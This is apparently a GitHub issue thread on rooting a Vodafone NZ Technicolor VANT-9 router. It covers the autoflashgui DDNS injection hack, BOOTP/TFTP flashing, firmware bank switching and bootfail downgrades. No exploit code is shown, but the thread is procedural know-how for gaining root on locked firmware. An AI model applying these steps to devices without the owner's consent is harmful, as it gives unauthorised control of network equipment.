I tried to run the forked https://github.com/jameskeenan295/autoflashgui against VBNT-Z but I couldn't connect to port 22 after it's finished running. I tried debugging and got the response of: b'{ "status":"error" }' after it posted the DDNS hack to http://192.168.1.1/modals/internet/dns_ddns.lp. Is that normal?

May I know if the hack is still functioning?

[LuKePicci]

Is that normal?

Make sure you're running the hack against the correct firmware version. Otherwise you should ask @jameskeenan295 directly

May I know if the hack is still functioning?

If you are running the same firmware version that hack was built for, then it must be still functional.

[gingming]

Is that normal?

Make sure you're running the hack against the correct firmware version. Otherwise you should ask @jameskeenan295 directly

May I know if the hack is still functioning?

If you are running the same firmware version that hack was built for, then it must be still functional.

I'm using the firmware linked from the repository, downloaded via torrent. However, after I flashed the firmware, the version that I got from the router is (17.4.b.0258-0841007-20181119083924-8307789f20403b4dde0d92852ec0af4bf362c645), which is different from the version listed on the page (17.4.0182CRF877-RC2.0.1).

I'm just wondering, usually after the DDNS hack, do you get a success response or error response?

[LuKePicci]

Ok, so you need to use type 3 instructions (ie. flash of type 2 firmware and inactive bank boot via enforced bootfail). Alternatively, if you manage to grab an RBI of your latest firmware and the firmware offers a firmware upgrade page in its webui then you can use "upgrade" to that same new firmware. This will cause an active bank switch. After the bank switch has occurred, it is enough to flash once again the Type2 firmware you downloaded from the repo via bootp/tftp (this always flashes bank_1). It will boot the old type 2 firmware you can get root on. Share the RBI for the new firmware if you have it. Otherwise, once you have got root, make sure to get a dump of the new firmware and share it. Then use the safe firmware upgrade instructions to install the new firmware without loosing root access.

…

________________________________ From: gingming <notifications@github.com> Sent: Friday, October 16, 2020 10:49:40 AM To: hack-technicolor/hack-technicolor <hack-technicolor@noreply.github.com> Cc: Luca Piccirillo <luca.piccirillo@gmail.com>; Mention <mention@noreply.github.com> Subject: Re: [hack-technicolor/hack-technicolor] Support for Technicolor DGA0130VDF (VANT-9) from Vodafone (#68) Is that normal? Make sure you're running the hack against the correct firmware version. Otherwise you should ask @jameskeenan295<https://github.com/jameskeenan295> directly May I know if the hack is still functioning? If you are running the same firmware version that hack was built for, then it must be still functional. I'm using the firmware linked from the repository, downloaded via torrent. However, after I flashed the firmware, the version that I got from the router is (17.4.b.0258-0841007-20181119083924-8307789f20403b4dde0d92852ec0af4bf362c645), which is different from the version listed on the page (17.4.0182CRF877-RC2.0.1). I'm just wondering, usually after the DDNS hack, do you get a success response or error response? — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub<#68 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/ACCRPNT5FPTTAKE6LJT4DP3SLACKJANCNFSM4JY2UBXA>.

[gingming]

I think the firmware in the repo link and the latest firmware from Vodafone are both the same. I can't find the old firmware. I did a file comparison using Winmerge and they are identical.

[LuKePicci]

The old type 2 firmware is that one in the repo. The new firmware is that one your device is running.

…

________________________________ From: gingming <notifications@github.com> Sent: Friday, October 16, 2020 12:44:47 PM To: hack-technicolor/hack-technicolor <hack-technicolor@noreply.github.com> Cc: Luca Piccirillo <luca.piccirillo@gmail.com>; Mention <mention@noreply.github.com> Subject: Re: [hack-technicolor/hack-technicolor] Support for Technicolor DGA0130VDF (VANT-9) from Vodafone (#68) Ok, so you need to use type 3 instructions (ie. flash of type 2 firmware and inactive bank boot via enforced bootfail). Alternatively, if you manage to grab an RBI of your latest firmware and the firmware offers a firmware upgrade page in its webui then you can use "upgrade" to that same new firmware. This will cause an active bank switch. After the bank switch has occurred, it is enough to flash once again the Type2 firmware you downloaded from the repo via bootp/tftp (this always flashes bank_1). It will boot the old type 2 firmware you can get root on. Share the RBI for the new firmware if you have it. Otherwise, once you have got root, make sure to get a dump of the new firmware and share it. Then use the safe firmware upgrade instructions to install the new firmware without loosing root access. …

________________________________ From: gingming notifications@github.com<mailto:notifications@github.com> Sent: Friday, October 16, 2020 10:49:40 AM To: hack-technicolor/hack-technicolor hack-technicolor@noreply.github.com<mailto:hack-technicolor@noreply.github.com> Cc: Luca Piccirillo luca.piccirillo@gmail.com<mailto:luca.piccirillo@gmail.com>; Mention mention@noreply.github.com<mailto:mention@noreply.github.com> Subject: Re: [hack-technicolor/hack-technicolor] Support for Technicolor DGA0130VDF (VANT-9) from Vodafone (#68<#68>) Is that normal? Make sure you're running the hack against the correct firmware version. Otherwise you should ask @jameskeenan295<https://github.com/jameskeenan295>https://github.com/jameskeenan295 directly May I know if the hack is still functioning? If you are running the same firmware version that hack was built for, then it must be still functional. I'm using the firmware linked from the repository, downloaded via torrent. However, after I flashed the firmware, the version that I got from the router is (17.4.b.0258-0841007-20181119083924-8307789f20403b4dde0d92852ec0af4bf362c645), which is different from the version listed on the page (17.4.0182CRF877-RC2.0.1). I'm just wondering, usually after the DDNS hack, do you get a success response or error response? — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub<#68 (comment)<#68 (comment)>>, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ACCRPNT5FPTTAKE6LJT4DP3SLACKJANCNFSM4JY2UBXA. Hi, I think the firmware in the repo link and the latest firmware from Vodafone are both the same. I can't find the old firmware. I did a file comparison using Winmerge and they are identical. — You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub<#68 (comment)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/ACCRPNTW3TL6HQCSXSSHFQDSLAPZ7ANCNFSM4JY2UBXA>.

[gingming]

The thing is that, the firmware from the repo (via torrent link) and the firmware that I downloaded from the supplier (http://downloads.vodafone.co.nz/ultrahub-plus/UHP-2-0-1-Prod.rbi) are both the same. I used WinMerge to do the comparison, unless that is not reliable. If that's the case, I don't think type 3 instructions will work as I don't have old firmware that works?

[LuKePicci]

The thing is that, the firmware from the repo (via torrent link) and the firmware that I downloaded from the supplier are both the same.

Correct, but the supplier pushed a newer one into the device.

type 3 instructions will work as I don't have old firmware that works

Type 3 instructions always work as long as there exist a Type 2 RBI available - yes, we have it.

[gingming]

I followed the Type 3 instructions to flash the firmware via BOOTP flashing. I can see that the firmware has been transmitted to the router. But after that, I'm stuck. I'm not sure how I can Check booted bank etc. How do I do the followings?

• read contents of /proc/banktable/active
• read serial console log during boot
• try flashing something with TFTP and see if it's being booted

I'm using Windows, I'm not sure how I can access the router to read those information.

Also, after it's flashed and auto-restarting, should I keep the TFTP Server running? If it is running, then my PC will get 10.0.0.100 as IP. The guide may need some clarification as well.

[LuKePicci]

• read contents of /proc/banktable/active

need root access, you have not yet

• read serial console log during boot

needs serial adapter conneted to device motherboard serial port

• try flashing something with TFTP and see if it's being booted

BOOTP flashing uses TFTP from firmware transfer, this is exactly what you did so far

Also, after it's flashed and auto-restarting, should I keep the TFTP Server running?

Nope, as soon as device reboots you can stop TFTP server and release any IP configuration made on purpuse

I can see that the firmware has been transmitted to the router.

Now your device bank_1 contains the firmware you just flashed. Is it booting that old firmware? If yes, then your booted bank is bank_1, otherwise it's booting from bank_2

[LuKePicci]

But after that, I'm stuck. I'm not sure how I can Check booted bank etc.

In the end of Type 3 guide you see the following:

Read how to Change booted bank.

The above link points to "Change booted bank", not "Check booted bank", you've got stuck because it is not needed to check the booted bank when coming from phase 2 of type 3 guide

[gingming]

I believe it's still booting the original firmware. I then tried to upgrade the firmware via WEB GUI and after that, it rebooted, and still on the original firmware. No root can be done. I may try again in case I got it wrong. I'll following the following steps, please let me know if I've got any steps wrong:

1. Run TFTP64
2. Power up the router to get 10.0.0.xxx
3. Restart the route with reset pressed
4. Wait for the old firmware to be transferred over to the router
5. Close TFTP64 while the router is restarting after the old firmware was copied over
6. After the router has fully started, go to WEB GUI to check for version, if it's still the original version, then flash the old firmware again via WEB GUI (this should cause it to do a Switchover)
7. Check the version of the firmware via WEB GUI again, it should show the old firmware version. If not, then I'm
   stuck again. Will Bootfail Procedure work?

Thanks again for your help.

[LuKePicci]

Your steps are almost correct except 6

After the router has fully started, go to WEB GUI to check for version, if it's still the original version, then flash the same current firmware again via WEB GUI (this should cause it to do a Switchover)

Then, since the above caused a switchover, repeat the TFTP steps again. This time the old firmware loaded via BOOTP would overwrite the new one you placed in bank_1 moments ago.

The Web GUI basically don't allow you to downgrade, to cause a switch you need to provide it the same or newer firmware version. Let's make this clearer in the wiki.

Now, we know you have no RBI available for the current/new firmware so this bankswitch strategy isn't viable. It will become viable for other people once you manage to root and grab this new RBI URL from Vodafone remote management service.

So, go back to that "Change booted bank" section, it says you have two options, the first one, switchover is a no go in your situation, unless you keep waiting for Vodafone to push another newer firmware update, so go for the second: bootfail.

[gingming]

Hmm, it's getting a bit too difficult for me to carry on in that direction now. I may continue in future if Vodafone put the latest firmware (for VBNT-Z) on the website for people to download.

Thanks for your help.

[LuKePicci]

I may continue in future if Vodafone put the latest firmware on the website for people to download.

Other people with rooted VBNT-Z may grab it as well.

[LuKePicci]

the copy I have: https://archive.org/details/vodafone-nz-ultrahub-firmware.tar

These are the same three VANT-9 firmwares we have in the repo

[davewyers]

Has anyone made any further progress with the VANT-9?

I have opened one on my bench and captured the attached serial boot output from the onboard UART.
VANT-9 Serial Boot.txt

It never gets to the point of allowing login so I am not sure that this will add any value.

[LuKePicci]

VANT-9 is already done, just read through this issue. Basically you need to use a custom version of AFG which is pending to be merged by @mswhirl

It never gets to the point of allowing login

You can't use serial console input until you enable it. AFG does it for you while setting up root access.

[davewyers]

Magic, I will give that a crack